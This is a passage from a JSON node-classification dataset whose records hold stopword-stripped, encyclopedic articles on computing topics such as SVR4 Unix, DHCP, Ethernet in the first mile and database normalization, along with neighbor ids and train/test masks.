companies licensed svr4 bundled computer systems workstations network servers svr4 systems vendors included atari atari system v commodore amiga unix data general dg/ux fujitsu uxp/ds hitachi hi-ux hewlett-packard hp-ux ncr unix/ns nec ews-ux up-ux ux/4800 super-ux oki oki system v pyramid technology dc/osx sgi irix siemens sinix sony news-os sumitomo electric industries seiux sun microsystems solaris illumos 2010s open-source platform software porting houses also sold enhanced supported intel x86 versions svr4 software vendors included dell dell unix everex esix micro station technology svr4 microport svr4 uhc svr4 primary platforms svr4 intel x86 sparc sparc version called solaris 2 internally sunos 5.x developed sun relationship sun terminated release svr4 meaning later versions solaris inherit features later svr4.x releases sun would 2005 release source code solaris 10 sunos 5.10 open-source opensolaris project creating forks open-source albeit heavily modified system v implementation available oracle took sun solaris forked proprietary release illumos continuation project developed open-source consortium intel-based resellers including unisys icl ncr corporation olivetti developed svr4.0mp multiprocessing capability allowing system calls processed processor interrupt servicing master processor release 4.1 es enhanced security added security features required orange book b2 compliance access control lists support dynamic loading kernel modules 1992 usl engaged joint venture novell called univel year saw release system v.4.2 univel unixware featuring veritas file system vendors included uhc consensys release 4.2mp completed late 1993 added support multiprocessing released unixware 2 1995 eric s. raymond warned prospective buyers svr4.2 versions often include on-line man pages 1994 buyers guide attributes change policy unix system laboratories santa cruz operation sco owners xenix eventually acquired unixware trademark distribution rights system v release 4.2 codebase novell vendors sun ibm hp continued use extend system v release 4 novell transferred ownership unix trademark open group operating system meets single unix specification sus effectively successor system v interface definition may granted unix rights sus met apple macos bsd derivative well several operating systems derived either bsd system v. system v release 5 developed 1997 santa cruz operation sco merger sco openserver svr3-derivative unixware focus large-scale servers released sco unixware 7 sco successor sco group also based sco openserver 6 svr5 codebase used major developer reseller system v release 6 announced sco released end 2004 apparently cancelled supposed support 64-bit systems industry coalesced around open group single unix specification version 3 unix 03 see also smallfoot 1980s 1990s variety svr4 versions unix available commercially x86 pc platform however market commercial unix pcs declined linux bsd became widely available late 1994 eric s. raymond discontinued pc-clone unix software buyer guide usenet stating reason dropping run linux longer find svr4 market interesting significant 1998 confidential memo microsoft stated linux track eventually x86 unix market predicted believe linux – moreso nt – biggest threat sco near future infoworld article 2001 characterized sco unixware bleak outlook due trounced market linux solaris idc predicted sco would continue see shrinking share market project monterey started 1998 combine major features existing commercial unix platforms joint project compaq ibm intel sco sequent computer systems target platform meant intel new ia-64 architecture itanium line processors however project abruptly canceled 2001 little progress 2001 several major unix variants sco unixware compaq tru64 unix sgi irix decline three major unix versions well market ibm aix hewlett-packard hp-ux sun solaris 2006 sgi declared bankruptcy analysts questioned whether linux would replace proprietary unix altogether 2006 article written computerworld mark hall economics linux cited major factor driving migration unix linux article also cites trends high-performance computing applications evidence dramatic shift unix linux november 2015 survey top 500 supercomputers unix used 1.2 running ibm aix linux used 98.8 survey november 2017 reports 100 using linux system v derivatives continued deployed proprietary server platforms principal variants system v remain commercial use aix ibm solaris oracle hp-ux hp according study done idc 2012 worldwide unix market divided ibm 56 oracle 19.2 hp 18.6 commercial unix vendor 2 market industry analysts generally characterize proprietary unix entered period slow permanent decline opensolaris derivatives svr4 descendants open-source software core system software continues developed illumos used illumos distributions smartos openindiana others system v interprocess communication mechanisms available unix-like operating systems derived system v particular linux reimplementation unix well bsd derivative freebsd posix 2008 specifies replacement interfaces freebsd maintains binary compatibility layer coff format allows freebsd execute binaries compiled svr3.2 derivatives sco unix interactive unix modern system v linux bsd platforms use elf file format natively compiled binaries",
    "neighbors": [
      2560,
      5120,
      7682,
      515,
      9731,
      3594,
      8725,
      1561,
      7709,
      563,
      7224,
      9784,
      1594,
      1595,
      10817,
      11332,
      6727,
      2120,
      585,
      6218,
      2132,
      86,
      11363,
      6760,
      8298,
      5748,
      633,
      636,
      640,
      2179,
      132,
      6787,
      6281,
      671,
      8355,
      7848,
      3241,
      5293,
      3248,
      11442,
      9921,
      8900,
      10436,
      6854,
      8395,
      2253,
      8410,
      6879,
      225,
      6369,
      9444,
      5864,
      9452,
      4333,
      11501,
      3323,
      2301,
      11013,
      5384,
      6412,
      8975,
      8976,
      2322,
      787,
      5397,
      3350,
      1304,
      8984,
      8991,
      7460,
      2345,
      6445,
      7983,
      1844,
      823,
      7483,
      9027,
      8516,
      10051,
      1360,
      4433,
      5969,
      10065,
      8020,
      11604,
      11608,
      5471,
      8545,
      8553,
      8048,
      5492,
      1399,
      2424,
      1400,
      7552,
      5506,
      3976,
      11145,
      1422,
      7566,
      5523,
      414,
      3487,
      3488,
      5534,
      6049,
      6056,
      5036,
      10156,
      9135,
      11184,
      9137,
      1971,
      9141,
      8631,
      9151,
      9665,
      3014,
      1480,
      9166,
      981,
      470,
      7134,
      6624,
      4067,
      1508,
      6116,
      4076,
      4589,
      7666,
      2035,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2996,
    "label": 5,
    "text": "Dynamic_Host_Configuration_Protocol:dynamic host configuration protocol dynamic host configuration protocol dhcp network management protocol used udp/ip networks whereby dhcp server dynamically assigns ip address network configuration parameters device network communicate ip networks dhcp server enables computers request ip addresses networking parameters automatically internet service provider isp reducing need network administrator user manually assign ip addresses network devices absence dhcp server computer device network needs manually assigned ip address assign apipa address enable communicate outside local subnet dhcp implemented networks ranging size home networks large campus networks regional internet service provider networks router residential gateway enabled act dhcp server residential network routers receive globally unique ip address within isp network within local network dhcp server assigns local ip address device connected network 1984 reverse address resolution protocol rarp defined rfc 903 introduced allow simple devices diskless workstations dynamically obtain suitable ip address however acted data link layer made implementation difficult many server platforms also required server present individual network link rarp superseded bootstrap protocol bootp defined rfc 951 september 1985 introduced concept relay agent allowed forwarding bootp packets across networks allowing one central bootp server serve hosts many ip subnets dhcp based bootp dynamically allocate ip addresses pool reclaim longer use also used deliver wide range extra configuration parameters ip clients including platform-specific parameters dhcp first defined rfc 1531 october 1993 due errors editorial process almost immediately reissued rfc 1541 four years later dhcpinform message type small changes added rfc 2131 remains standard ipv4 networks dhcpv6 initially described rfc 3315 2003 updated many subsequent rfcs rfc 3633 added dhcpv6 mechanism prefix delegation stateless address autoconfiguration added rfc 3736 udp/ip defines devices one network communicate devices another network dhcp server manage udp/ip settings devices network automatically dynamically assigning ip addresses devices dhcp operates based client–server model computer device connects network dhcp client software sends dhcp broadcast query requesting necessary information dhcp server network may service request dhcp server manages pool ip addresses information client configuration parameters default gateway domain name name servers time servers receiving dhcp request dhcp server may respond specific information client previously configured administrator specific address information valid entire network time period allocation lease valid dhcp client typically queries information immediately booting periodically thereafter expiration information dhcp client refreshes assignment initially requests parameter values dhcp server may assign new address based assignment policies set administrators large networks consist multiple links single dhcp server may service entire network aided dhcp relay agents located interconnecting routers agents relay messages dhcp clients dhcp servers located different subnets depending implementation dhcp server may three methods allocating ip addresses dhcp used internet protocol version 4 ipv4 ipv6 versions serve purpose details protocol ipv4 ipv6 differ sufficiently may considered separate protocols ipv6 operation devices may alternatively use stateless address autoconfiguration ipv6 hosts may also use link-local addressing achieve operations restricted local network link dhcp employs connectionless service model using user datagram protocol udp implemented two udp port numbers operations bootstrap protocol bootp udp port number 67 destination port server udp port number 68 used client dhcp operations fall four phases server discovery ip lease offer ip lease request ip lease acknowledgement stages often abbreviated dora discovery offer request acknowledgement dhcp operation begins clients broadcasting request client server different subnets dhcp helper dhcp relay agent may used clients requesting renewal existing lease may communicate directly via udp unicast since client already established ip address point additionally broadcast flag 1 bit 2 byte flags field bits reserved set 0 client use indicate way broadcast unicast receive dhcpoffer 0x8000 broadcast 0x0000 unicast usually dhcpoffer sent unicast hosts accept unicast packets ip addresses configured flag used work around issue dhcp client broadcasts dhcpdiscover message network subnet using destination address 255.255.255.255 limited broadcast specific subnet broadcast address directed broadcast dhcp client may also request last known ip address client remains connected network server may grant request otherwise depends whether server set authoritative authoritative server denies request causing client issue new request non-authoritative server simply ignores request leading implementation-dependent timeout client expire request ask new ip address example htype set 1 specify medium used ethernet hlen set 6 ethernet address mac address 6 octets long chaddr set mac address used client options set well dhcp server receives dhcpdiscover message client ip address lease request dhcp server reserves ip address client makes lease offer sending dhcpoffer message client message contains client client id traditionally mac address ip address server offering subnet mask lease duration ip address dhcp server making offer dhcp server may also take notice hardware-level mac address underlying transport layer according current rfcs transport layer mac address may used client id provided dhcp packet dhcp server determines configuration based client hardware address specified chaddr client hardware address field server 192.168.1.1 specifies client ip address yiaddr ip address field response dhcp offer client replies dhcprequest message broadcast server requesting offered address client receive dhcp offers multiple servers accept one dhcp offer based required server identification option request broadcast messaging servers informed whose offer client accepted dhcp servers receive message withdraw offers made client return offered ip address pool available addresses dhcp server receives dhcprequest message client configuration process enters final phase acknowledgement phase involves sending dhcpack packet client packet includes lease duration configuration information client might requested point ip configuration process completed protocol expects dhcp client configure network interface negotiated parameters client obtains ip address probe newly received address e.g arp address resolution protocol prevent address conflicts caused overlapping address pools dhcp servers dhcp client may request information server sent original dhcpoffer client may also request repeat data particular application example browsers use dhcp inform obtain web proxy settings via client sends request dhcp server release dhcp information client deactivates ip address client devices usually know users may unplug network protocol mandate sending dhcp release dhcp server provide optional configuration parameters client rfc 2132 describes available dhcp options defined internet assigned numbers authority iana dhcp bootp parameters dhcp client select manipulate overwrite parameters provided dhcp server unix-like systems client-level refinement typically takes place according values configuration file /etc/dhclient.conf options octet strings varying length first octet option code second octet number following octets remaining octets code dependent example dhcp message-type option offer would appear 0x35 0x01 0x02 0x35 code 53 dhcp message type 0x01 means one octet follows 0x02 value offer following tables list available dhcp options listed rfc 2132 iana registry option exists identify vendor functionality dhcp client information variable-length string characters octets meaning specified vendor dhcp client one method dhcp client utilize communicate server using certain type hardware firmware set value dhcp requests called vendor class identifier vci option 60 method allows dhcp server differentiate two kinds client machines process requests two types modems appropriately types set-top boxes also set vci option 60 inform dhcp server hardware type functionality device value option set gives dhcp server hint required extra information client needs dhcp response relay agent information option option 82 specifies container attaching sub-options dhcp requests transmitted dhcp relay dhcp server small networks one ip subnet managed dhcp clients communicate directly dhcp servers however dhcp servers also provide ip addresses multiple subnets case dhcp client yet acquired ip address communicate directly dhcp server using ip routing routable ip address know link layer address router know ip address dhcp server order allow dhcp clients subnets directly served dhcp servers communicate dhcp servers dhcp relay agents installed subnets dhcp client broadcasts local link relay agent receives broadcast transmits one dhcp servers using unicast relay agent stores ip address field giaddr field dhcp packet dhcp server uses giaddr-value determine subnet relay agent received broadcast allocates ip address subnet dhcp server replies client sends reply giaddr-address using unicast relay agent retransmits response local network situation communication relay agent dhcp server typically uses source destination udp port 67 dhcp ensures reliability several ways periodic renewal rebinding failover dhcp clients allocated leases last period time clients begin attempt renew leases half lease interval expired sending unicast dhcprequest message dhcp server granted original lease server unreachable fail respond dhcprequest however case client repeats dhcprequest time time dhcp server comes back becomes reachable dhcp client succeed contacting renew lease dhcp server unreachable extended period time dhcp client attempt rebind broadcasting dhcprequest rather unicasting broadcast dhcprequest message reach available dhcp servers dhcp server able renew lease time order rebinding work client successfully contacts backup dhcp server server must accurate information client binding maintaining accurate binding information two servers complicated problem servers able update lease database must mechanism avoid conflicts updates independent servers proposal implementing fault-tolerant dhcp servers submitted internet engineering task force never formalized rebinding fails lease eventually expire lease expires client must stop using ip address granted lease time restart dhcp process beginning broadcasting codice_1 message since lease expired accept ip address offered new ip address presumably different dhcp server able use network however since ip address changed ongoing connections broken 2018 dhcp remains widely-used automatically assign ip addresses newer iterations assigning ip addresses include dhcpv6 slaac base dhcp include mechanism authentication vulnerable variety attacks attacks fall three main categories client way validate identity dhcp server unauthorized dhcp servers commonly called rogue dhcp operated networks providing incorrect information dhcp clients serve either denial-of-service attack preventing client gaining access network connectivity man-in-the-middle attack dhcp server provides dhcp client server ip addresses ip address one dns servers attacker convince dhcp client dns lookups dns server therefore provide answers dns queries client turn allows attacker redirect network traffic allowing eavesdrop connections client network servers contacts simply replace network servers dhcp server secure mechanism authenticating client clients gain unauthorized access ip addresses presenting credentials client identifiers belong dhcp clients also allows dhcp clients exhaust dhcp server store ip addresses—by presenting new credentials time asks address client consume available ip addresses particular network link preventing dhcp clients getting service dhcp provide mechanisms mitigating problems relay agent information option protocol extension rfc 3046 usually referred industry actual number option 82 allows network operators attach tags dhcp messages messages arrive network operator trusted network tag used authorization token control client access network resources client access network upstream relay agent lack authentication prevent dhcp server operator relying authorization token another extension authentication dhcp messages rfc 3118 provides mechanism authenticating dhcp messages 2002 nowiki rfc 3118 /nowiki seen widespread adoption problems managing keys large numbers dhcp clients 2007 book dsl technologies remarked numerous security vulnerabilities identified security measures proposed rfc 3118 fact combined introduction 802.1x slowed deployment take-rate authenticated dhcp never widely deployed 2010 book notes implementations dhcp authentication challenges key management processing delays due hash computation deemed heavy price pay perceived benefits architectural proposals 2008 involve authenticating dhcp requests using 802.1x pana transport eap ietf proposal made including eap dhcp so-called eapodhcp appear progressed beyond ietf draft level last dates 2010",
    "neighbors": [
      4609,
      514,
      10242,
      1030,
      9734,
      8211,
      6681,
      6682,
      5150,
      10271,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      9279,
      6723,
      11332,
      71,
      8265,
      4687,
      10325,
      10851,
      10341,
      10344,
      3695,
      10354,
      4723,
      4725,
      2679,
      119,
      4729,
      5250,
      5251,
      9860,
      8837,
      649,
      2185,
      9868,
      3218,
      9365,
      11413,
      152,
      2717,
      2206,
      3742,
      9380,
      9381,
      3751,
      3752,
      172,
      10924,
      2222,
      6318,
      10926,
      9909,
      7863,
      4793,
      7865,
      4797,
      702,
      10433,
      7364,
      8391,
      8905,
      1229,
      5843,
      7901,
      10461,
      7391,
      3297,
      2797,
      751,
      8432,
      8946,
      755,
      1779,
      5875,
      7411,
      6904,
      3322,
      2811,
      4863,
      4355,
      9987,
      3847,
      2827,
      1297,
      10005,
      1814,
      6422,
      5402,
      5405,
      7965,
      6436,
      9511,
      7984,
      10035,
      9524,
      6456,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      328,
      10058,
      849,
      6993,
      1876,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      1893,
      871,
      5991,
      361,
      11112,
      10092,
      367,
      8054,
      891,
      6524,
      6013,
      2430,
      2431,
      11647,
      10115,
      11147,
      6541,
      7570,
      5531,
      1436,
      10144,
      10659,
      933,
      2983,
      9640,
      425,
      6576,
      6577,
      2996,
      10171,
      3006,
      9670,
      10698,
      2509,
      7121,
      8669,
      8670,
      10723,
      8676,
      10727,
      4074,
      3564,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 2997,
    "label": 3,
    "text": "Aliens:_The_Computer_Game_(1986_video_game):aliens computer game 1986 video game aliens computer game video game developed published activision commodore 64 apple ii zx spectrum computer systems based film title also known aliens us europe initially planned released aliens second part aliens series six minigames strung together via graphical interactive sequences akin adventure game though interaction possible advancing dialog displayed speech balloons minigames mostly action sequences involve piloting ship sulaco planet surface recognizing equipment fighting aliens time release game received mixed reviews including scores 85 commodore format 8/10 averaged computer video games 4/10 crash 5/10 sinclair user 9/10 sinclair 60 zzap 64 info gave commodore 64 version four stars five aliens appropriately creepy sequence well done plays quite differently others venturebeat stephen kleckner commented 2014 feature lot compilation-designed titles aliens falls trap collection mediocre experiences instead game singular focus … hardcore fans commodore 64 load one everyone else ’ missing much let play video wo n't provide hand chris cummins topless robot wrote 2010 now-crude graphics aside still arguably best game based films alien saga",
    "neighbors": [
      2434
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2998,
    "label": 5,
    "text": "Ethernet_in_the_first_mile:ethernet first mile ethernet first mile efm refers using one ethernet family computer network protocols telecommunications company customer premises customer point view first mile although access network point view known last mile working group institute electrical electronics engineers ieee produced standards known ieee 802.3ah-2004 later included overall standard ieee 802.3-2008 although often used businesses also known ethernet home etth one family standards known ethernet passive optical network epon uses passive optical network wide metro local area networks using various forms ethernet goal eliminate non-native transport ethernet asynchronous transfer mode atm access networks one early effort etherloop technology invented nortel networks 1996 spun company elastic networks 1998 principal inventor jack terry hope combine packet-based nature ethernet ability digital subscriber line dsl technology work existing telephone access wires name comes local loop traditionally describes wires telephone company office subscriber protocol half-duplex control provider side loop adapted line conditions peak 10 mbit/s advertised 4-6 mbit/s typical distance symbol rates 1 megabaud 1.67 megabaud 2 4 6 bits per symbol etherloop product name registered trademark us canada etherloop technology eventually purchased paradyne networks 2002 turn purchased zhone technologies 2005 another effort concept promoted michael silverton using ethernet variants used fiber optic communication residential well business customers example become known fiber home ftth fiberhood networks company provided service 1999 2001 early products around year 2000 marketed 10bases infineon technologies although technically use baseband signalling rather passband very-high-bit-rate digital subscriber line vdsl technology patent filed 1997 peleg shimon porat boaz noam alroy rubinstain avinoam sfadya yackow long reach ethernet product name used cisco systems starting 2001 supported modes 5 mbit/s 10 mbit/s 15 mbit/s depending distance october 2000 howard frazier issued call interest ethernet last mile november 2000 meeting ieee 802.3 created ethernet first mile study group july 16 2001 802.3ah working group parallel participating vendors formed ethernet first mile alliance efma december 2001 promote ethernet subscriber access technology support ieee standard efforts early meeting etherloop technology called 100base-cu another technology called eovdsl ethernet vdsl working group efm standard approved june 24 2004 published september 7 2004 ieee 802.3ah-2004 2005 included base ieee 802.3 standard 2005 efma absorbed metro ethernet forum early 2006 work began even higher-speed 10 gigabit/second ethernet passive optical network 10g-epon standard ratified 2009 ieee 802.3av work epon continued ieee p802.3bk extended epon task force formed march 2012 major goals task force included adding support px30 px40 prx40 pr40 power budget classes 1g-epon 10g-epon 802.3bk amendment approved ieee-sa sb august 2013 published soon thereafter standard ieee std 802.3bk-2013 november 2011 ieee 802.3 began work epon protocol coax epoc efm defines ethernet transmitted new media types using new ethernet physical layer phy interfaces efm also addresses issues required mass deployment ethernet services operations administration management oa compatibility existing technologies plain old telephone service spectral compatibility copper twisted pair fiber home use passive optical network additionally clause 57 defines link-level oa including discovery link monitoring remote fault indication loopbacks variable access 2base-tl ieee 802.3-2008 physical layer phy specification full-duplex long-reach point-to-point ethernet link voice-grade copper wiring unlike 10base-t 100base-t 1000base-t phys providing single rate 10 100 1000 mbit/s respectively 2base-tl link rate vary depending copper media characteristics length wire diameter gauge number pairs link aggregated amount crosstalk pairs etc desired link parameters desired snr margin power back-off etc regional spectral limitations 2base-tl phys deliver minimum 2 mbit/s distances using itu-t g.991.2 g.shdsl.bis technology single copper pair phys may also support optional aggregation bonding multiple copper pairs called pme aggregation function paf single pair minimum possible link bitrate 192 kbit/s 3 x 64 kbit/s maximum bitrate 5.7 mbit/s 89 x 64 kbit/s 0.5 mm wire 3 db noise margin spectral limitations max bitrate achieved distances max achievable bitrate 850 kbit/s throughput 2base-tl link lower link bitrate average 5 due 64/65-octet encoding paf overhead factors depend packet size 10pass-ts ieee 802.3-2008 physical layer phy specification full-duplex short reach point-to-point ethernet link voice-grade copper wiring 10pass-ts phys deliver minimum 10 mbit/s distances using itu-t g.993.1 vdsl technology single copper pair phys may also support optional aggregation bonding multiple copper pairs called pme aggregation function paf unlike ethernet physical layers provide single rate 10 100 1000 mbit/s 10pass-ts link rate vary similar 2base-tl depending copper channel characteristics length wire diameter gauge wiring quality number pairs link aggregated factors vdsl short range technology designed provide broadband distances less 1 km voice-grade copper twisted pair line connection data rates deteriorate quickly line distance increases led vdsl referred fiber curb technology requires fiber backhaul connect carrier network greater distances vdsl ethernet first mile services using may useful way standardise functionality metro ethernet networks potentially distribute internet access services voice-grade wiring multi-dwelling unit buildings however vdsl2 already proven versatile faster standard greater reach vdsl",
    "neighbors": [
      3040,
      2785,
      5185,
      4202,
      6670,
      816,
      1618,
      6834,
      7698,
      5270
    ],
    "mask": "Test"
  },
  {
    "node_id": 2999,
    "label": 0,
    "text": "Semantic_compression:semantic compression natural language processing semantic compression process compacting lexicon used build textual document set documents reducing language heterogeneity maintaining text semantics result ideas represented using smaller set words applications semantic compression lossy compression increased prolixity compensate lexical compression original document reconstructed reverse process semantic compression basically achieved two steps using frequency dictionaries semantic network step 1 requires assembling word frequencies information semantic relationships specifically hyponymy moving upwards word hierarchy cumulative concept frequency calculating adding sum hyponyms frequencies frequency hypernym formula_1 formula_2 hypernym formula_3 desired number words top cumulated frequencies chosen build targed lexicon second step compression mapping rules defined remaining words order handle every occurrence less frequent hyponym hypernym output text fragment text processed semantic compression words bold replaced hypernyms nest building social insects paper wasps honey bees organize colonies different ways new study researchers report despite differences insects rely network genes guide social behavior.the study appears proceedings royal society b biological sciences honey bees paper wasps separated 100 million years evolution striking differences divvy work maintaining colony procedure outputs following text facility building insect insects honey insects arrange biological groups different structure new study researchers report despite difference opinions insects act network genes steer party demeanor study appears proceeding institution bacteria biological sciences honey insects insect separated hundred million years organic processes impinging differences opinions divvy work affirming biological group natural tendency keep natural language expressions concise perceived form implicit semantic compression omitting unmeaningful words redundant meaningful words especially avoid pleonasms vector space model compacting lexicon leads reduction dimensionality results less computational complexity positive influence efficiency semantic compression advantageous information retrieval tasks improving effectiveness terms precision recall due precise descriptors reduced effect language diversity – limited language redundancy step towards controlled dictionary example possible display output natural text re-applying inflexion adding stop words",
    "neighbors": [
      7780,
      2247,
      1737,
      887,
      10231
    ],
    "mask": "None"
  },
  {
    "node_id": 3000,
    "label": 8,
    "text": "WSMO:wsmo wsmo web service modeling ontology conceptual model relevant aspects related semantic web services provides ontology based framework supports deployment interoperability semantic web services wsmo four main components wsmo working group part essi cluster aligns research development efforts areas semantic web services several european fp6 research projects wsmo working group includes wsml working group aims developing language called web services modeling language wsml formalizes web services modeling ontology wsmo",
    "neighbors": [
      5449,
      1481,
      7408
    ],
    "mask": "Test"
  },
  {
    "node_id": 3001,
    "label": 1,
    "text": "Bitemporal_Modeling:bitemporal modeling bitemporal modeling specific case temporal database information modeling technique designed handle historical data along two different timelines makes possible rewind information actually combination recorded point time order able information discarded even erroneous within example financial reporting often desirable able recreate old report actually looked time creation looked given corrections made data creation implementations bitemporal modeling mostly done using relational databases bitemporal modeling considered different dimensional modeling complementary database normalization standard provides language constructs working bitemporal data however many current solutions still vendor-specific bitemporal modeling uses bitemporal structures basic components results databases consistent type temporality data focusing completeness accuracy data bitemporal modeling facilitates creation complete audit trails data data becomes immutable specifically allows queries provide",
    "neighbors": [
      5794,
      9286,
      2512,
      2901,
      7767,
      3004,
      5151
    ],
    "mask": "None"
  },
  {
    "node_id": 3002,
    "label": 9,
    "text": "Acornsoft_LISP:acornsoft lisp acornsoft lisp marketed simply lisp dialect commercial implementation lisp programming language released early 1980s 8-bit acorn atom bbc micro acorn electron computers acornsoft lisp released cassette disk rom cartridge rom cartridge version instantaneous loading well greater amount available free ram user definitions contrast large-scale lisp implementations acornsoft variant modest number built-in definitions fit limited memory space 8-bit acorn computers interpreter implemented 6502 machine-code 5.5k size based owl lisp written mike gardner owl computers published apple ii 1979 acornsoft licensed owl computers 1981 developed acorn atom bbc microcomputer supplied lisp workspace image containing commonly used built-in functions constants 3k size although could deleted needed user free memory supported datatypes included nested lists 16-bit signed integers strings 127 characters length loop keywords available program control acornsoft also commissioned book lisp bbc microcomputer arthur norman gillian cattell published 1983 arthur norman lecturer computer science cambridge university gillian cattell research lisp cambridge book sold separately software contained examples illustrating use acornsoft specific features vdu function allowing machine-specific graphics capabilities book also contained working examples including tree-sorting program arbitrary arithmetic package animal guessing game route finding program graphics package simple compiler adventure game route-finding demo program supplied standard interpreter program loaded command codice_1 tested typing codice_2 example display output codice_3 thus showing total mileage shortest possible route listing intermediate towns visited",
    "neighbors": [
      7281,
      8830,
      6502
    ],
    "mask": "Test"
  },
  {
    "node_id": 3003,
    "label": 1,
    "text": "Gender,_Institutions_and_Development_Database:gender institutions development database oecd gender institutions development gid database gid-db contains 60 data indicators gender equality gid-db introduced 2006 oecd development centre provide data tool help researchers policy makers determine analyze obstacles women social economic development provides gender-related data 162 countries afghanistan zimbabwe thereby covering regions country-income-categories world gid database structured around key traditional measurements gender equality including education data literacy rates school enrollments gender health percentage births attended skilled personnel economic status political status percentage legislators gender gid-db also introduced non-traditional data indicators social institutions cultural practices social norms affect gender equality new measurements thoroughly presented next section providing new indicator information formerly hidden instances gender discrimination database complements data compilations undp human development report world bank group genderstats database world economic forum global gender gap report gid database groups 12 social-institution indicators 5 different categories 12 indicators cultural traditional practice impacts upon gender equality indicator coded 0 indicating discrimination i.e. equality 1 indicating high discrimination high inequality depending extent discrimination percentage females suffer application specific social institution example consider inheritance second social institution indicator 10 percent female population country report restricted access inheritance daughters inheriting half amount granted sons indicator inheritance would 10 percent x 0.50 0.05 nearly equality values 0 complicated describe briefly case omitted family code civil liberties physical integrity son preference ownership rights gid database source brief descriptions namely gid-db includes complete description data indicator called metadata stays hidden one clicks indicator little red – working definitions data indicators easily available online right data gid-db statistically applied toward identifying factors determine women labour-force participation varies across database countries reported results suggest social-institution factors indicators outweigh traditional indicators income per capita gid database including social-institution indicators thus may useful solving various economic development problems offering complete set indicators choose answering policy questions research topics undp un development programme publishes two composite indexes gender equality based traditional indicators above-mentioned ones gid-db namely gender empowerment measure gem gender-related development index gdi 2009 similarly oecd development centre introduced social institutions gender index sigi described article sigi exclusively based 12 new social institutions 5 groups providing sigi 5 components given exclusive focus social institutions sigi highly specialized measure gender equality – confused gem gdi sigi 5 components added 2009 gid-db readily accessible described specific part latter data accessed via oecd website statextracts gid-db whose sidebar gid database components selected ready click 12 social institution indicators already display main part screen information working definitions data plus country notes displayed hidden clicking little red many oecd datasets listed sidebar addition gid-db data subject article",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 3004,
    "label": 1,
    "text": "Database_normalization:database normalization database normalization process structuring relational database accordance series so-called normal forms order reduce data redundancy improve data integrity first proposed edgar f. codd part relational model normalization entails organizing columns attributes tables relations database ensure dependencies properly enforced database integrity constraints accomplished applying formal rules either process synthesis creating new database design decomposition improving existing database design basic objective first normal form defined codd 1970 permit data queried manipulated using universal data sub-language grounded first-order logic sql example data sub-language albeit one codd regarded seriously flawed objectives normalization beyond 1nf first normal form stated follows codd attempt made modify update insert delete relation following undesirable side-effects may arise relations sufficiently normalized fully normalized database allows structure extended accommodate new types data without changing existing structure much result applications interacting database minimally affected normalized relations relationship one normalized relation another mirror real-world concepts interrelationships querying manipulating data within data structure normalized following non-1nf representation customers credit card transactions involves complexity really necessary br customer corresponds 'repeating group transactions automated evaluation query relating customers transactions therefore would broadly involve two stages example order find monetary sum transactions occurred october 2003 customers system would know must first unpack transactions group customer sum amounts transactions thus obtained date transaction falls october 2003 one codd important insights structural complexity reduced reduced structural complexity gives users application dbms power flexibility formulate evaluate queries normalized equivalent structure might look like modified structure key cust id first relation cust id tr id second relation row represents individual credit card transaction dbms obtain answer interest simply finding rows date falling october summing amounts data structure places values equal footing exposing dbms directly potentially participate directly queries whereas previous situation values embedded lower-level structures handled specially accordingly normalized design lends general-purpose query processing whereas unnormalized design normalized version also allows user change customer name one place guards errors arise customer name misspelled records codd introduced concept normalization known first normal form 1nf 1970 codd went define second normal form 2nf third normal form 3nf 1971 codd raymond f. boyce defined boyce-codd normal form bcnf 1974 informally relational database relation often described normalized meets third normal form 3nf relations free insertion update deletion anomalies normal forms least normalized normalized normalization database design technique used design relational database table higher normal form process progressive higher level database normalization achieved unless previous levels satisfied means data unnormalized form least normalized aiming achieve highest level normalization first step would ensure compliance first normal form second step would ensure second normal form satisfied forth order mentioned data conform sixth normal form however worth noting normal forms beyond 4nf mainly academic interest problems exist solve rarely appear practice please note data following example intentionally designed contradict normal forms real life quite possible able skip normalization steps table n't contain anything contradicting given normal form also commonly occurs fixing violation one normal form also fixes violation higher normal form process also one table chosen normalization step meaning end example process might still tables satisfying highest normal form let database table following structure assume example book one author satisfy 1nf need ensure values column table atomic initial table subject contains set values meaning comply one way achieve first normal form would separate duplicities multiple columns although table formally complies 1nf atomic problem solution obvious book three subjects added database without altering structure solve problem elegant way necessary identify entities represented table separate respective tables case would result book subject publisher tables simply separating initial data multiple tables would break connection data means also need determine relationships newly introduced tables might noticed publisher id column book table foreign key realizing many-to-one relation book publisher book fit many subjects well subject may correspond many books means also need define many-to-many relationship achieve creating link table instead one table unnormalized form 4 tables conforming 1nf book table one candidate key compound key title format consider following table fragment attributes part key depend title price also depends format conform 2nf remove duplicities every non-key attribute must depend whole key part normalize table make title simple key every non-key attribute depends upon whole key remove price separate table dependency format preserved book table conforms 2nf table third normal form 3nf table 2nf transitive dependencies note book table rows previously omitted brevity genre id genre name depend upon primary key title independent one another dependency say genre name primary key deduced dependency genre name genre id genre id primary key since titles genres dependency introduces redundant data book table eliminated abstracting dependency genre name genre id table book table third normal form although tables 1nf definition normalized normalized commonly used mean 3nf eknf falls strictly 3nf bcnf n't much discussed literature intended “ capture salient qualities 3nf bcnf ” avoiding problems namely 3nf “ forgiving ” bcnf “ prone computational complexity ” since rarely mentioned literature included example information eknf see wikipedia page relational schema r considered boyce–codd normal form bcnf every one dependencies x → one following conditions hold true consider table 3nf previous step non-trivial dependency violating bcnf author → author nationality therefore table decomposed attribute represents fact key whole key nothing key therefore bcnf achieved assume database owned book retailer franchise several franchisees shops different locations therefore retailer decided add table contains data availability books different locations table structure consists compound primary key n't contain non-key attributes already bcnf therefore also satisfies previous normal forms however assume available books offered area might notice title unambiguously bound certain location therefore table n't satisfy 4nf means satisfy fourth normal form table needs decomposed well every record unambiguously identified superkey therefore 4nf satisfied suppose franchisees also order books different suppliers let relation also subject following constraint table 4nf supplier id equal join projections supplier id book book franchisee id franchisee id supplier id component join dependency superkey sole superkey entire heading table satisfy etnf decomposed decomposition compliance etnf ensured spot table satisfying 5nf usually necessary examine data thoroughly suppose table 4nf example little modification data let examine satisfies 5nf decompose table lower redundancies get following two tables happens try join tables query would return following data apparently join returns three rows let try add another table clarify relation end three separate tables join return actually possible join three tables means n't possible decompose franchisee book location without data loss therefore table already satisfies 5nf c.j date argued database 5nf truly 